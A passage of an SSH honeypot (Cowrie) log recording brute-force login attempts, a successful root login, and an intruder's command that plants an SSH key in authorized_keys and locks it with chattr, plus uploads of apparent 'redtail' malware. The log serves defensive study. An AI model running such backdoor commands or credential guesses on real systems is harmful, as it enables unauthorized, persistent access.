{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54700,"dst_ip":"1.2.3.4","dst_port":22,"session":"0914d75faecb","protocol":"ssh","message":"New connection: 212.227.235.229:54700 (1.2.3.4:22) [session: 0914d75faecb]","sensor":"my-vps","timestamp":"2025-08-28T13:20:09.675371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:20:09.677061Z","src_ip":"212.227.235.229","session":"0914d75faecb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:20:09.885950Z","src_ip":"212.227.235.229","session":"0914d75faecb"}
{"eventid":"cowrie.login.failed","username":"syc","password":"syc123","message":"login attempt [syc/syc123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:20:10.761832Z","src_ip":"212.227.235.229","session":"0914d75faecb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34874,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aea8f6f3377","protocol":"ssh","message":"New connection: 212.227.125.160:34874 (1.2.3.4:22) [session: 6aea8f6f3377]","sensor":"my-vps","timestamp":"2025-08-28T13:20:11.055586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:20:11.056636Z","src_ip":"212.227.125.160","session":"6aea8f6f3377"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:20:11.233230Z","src_ip":"212.227.125.160","session":"6aea8f6f3377"}
{"eventid":"cowrie.login.failed","username":"redis","password":"qwerty","message":"login attempt [redis/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:20:11.803274Z","src_ip":"212.227.125.160","session":"6aea8f6f3377"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:20:11.973579Z","src_ip":"212.227.235.229","session":"0914d75faecb"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:20:12.985147Z","src_ip":"212.227.125.160","session":"6aea8f6f3377"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:20:27.210917Z","src_ip":"79.124.8.120","session":"f0a89d7932ab"}
{"eventid":"cowrie.session.closed","duration":180.44031357765198,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:20:27.215985Z","src_ip":"79.124.8.120","session":"f0a89d7932ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59010,"dst_ip":"1.2.3.4","dst_port":22,"session":"f18429cdf297","protocol":"ssh","message":"New connection: 212.227.125.160:59010 (1.2.3.4:22) [session: f18429cdf297]","sensor":"my-vps","timestamp":"2025-08-28T13:20:45.852143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:20:45.853115Z","src_ip":"212.227.125.160","session":"f18429cdf297"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:20:46.022254Z","src_ip":"212.227.125.160","session":"f18429cdf297"}
{"eventid":"cowrie.login.failed","username":"redis","password":"123123","message":"login attempt [redis/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:20:46.535326Z","src_ip":"212.227.125.160","session":"f18429cdf297"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:20:47.706294Z","src_ip":"212.227.125.160","session":"f18429cdf297"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43336,"dst_ip":"1.2.3.4","dst_port":22,"session":"99126c01dca6","protocol":"ssh","message":"New connection: 212.227.235.229:43336 (1.2.3.4:22) [session: 99126c01dca6]","sensor":"my-vps","timestamp":"2025-08-28T13:21:09.286189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:21:12.036496Z","src_ip":"212.227.235.229","session":"99126c01dca6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:21:12.037183Z","src_ip":"212.227.235.229","session":"99126c01dca6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":29760,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ecac285f29c","protocol":"ssh","message":"New connection: 80.94.95.15:29760 (1.2.3.4:22) [session: 4ecac285f29c]","sensor":"my-vps","timestamp":"2025-08-28T13:21:15.330938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:21:15.331834Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:21:15.386074Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123@#","message":"login attempt [admin/admin123@#] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:15.692565Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789a","message":"login attempt [admin/123456789a] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:16.745808Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"888888","message":"login attempt [admin/888888] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:17.800283Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd@123","message":"login attempt [admin/P@ssw0rd@123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:18.853805Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Huawei12#$","message":"login attempt [admin/Huawei12#$] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:19.907250Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55268,"dst_ip":"1.2.3.4","dst_port":22,"session":"b35311e0c39b","protocol":"ssh","message":"New connection: 212.227.125.160:55268 (1.2.3.4:22) [session: b35311e0c39b]","sensor":"my-vps","timestamp":"2025-08-28T13:21:20.134078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:21:20.249219Z","src_ip":"212.227.125.160","session":"b35311e0c39b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:21:20.330095Z","src_ip":"212.227.125.160","session":"b35311e0c39b"}
{"eventid":"cowrie.login.failed","username":"redis","password":"111111","message":"login attempt [redis/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:21.004500Z","src_ip":"212.227.125.160","session":"b35311e0c39b"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:21:21.234005Z","src_ip":"80.94.95.15","session":"4ecac285f29c"}
{"eventid":"cowrie.login.success","username":"root","password":"@uct10nsql","message":"login attempt [root/@uct10nsql] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:21:21.502496Z","src_ip":"212.227.235.229","session":"99126c01dca6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:21:22.180300Z","src_ip":"212.227.125.160","session":"b35311e0c39b"}
{"eventid":"cowrie.session.closed","duration":"17.5","message":"Connection lost after 17.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:21:26.788667Z","src_ip":"212.227.235.229","session":"99126c01dca6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13712,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8fe7d1972a7","protocol":"ssh","message":"New connection: 212.227.235.229:13712 (1.2.3.4:22) [session: f8fe7d1972a7]","sensor":"my-vps","timestamp":"2025-08-28T13:21:26.897643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:21:26.898753Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-28T13:21:27.004580Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.login.success","username":"root","password":"@uct10nsql","message":"login attempt [root/@uct10nsql] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:21:27.324643Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:21:50.352660Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.353466Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.461703Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.568452Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.570517Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.573188Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.575864Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.578392Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.579511Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.closed","duration":"23.8","message":"Connection lost after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:21:50.687140Z","src_ip":"212.227.235.229","session":"f8fe7d1972a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45848,"dst_ip":"1.2.3.4","dst_port":22,"session":"d241ba47617e","protocol":"ssh","message":"New connection: 212.227.125.160:45848 (1.2.3.4:22) [session: d241ba47617e]","sensor":"my-vps","timestamp":"2025-08-28T13:21:53.668018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:21:53.669059Z","src_ip":"212.227.125.160","session":"d241ba47617e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-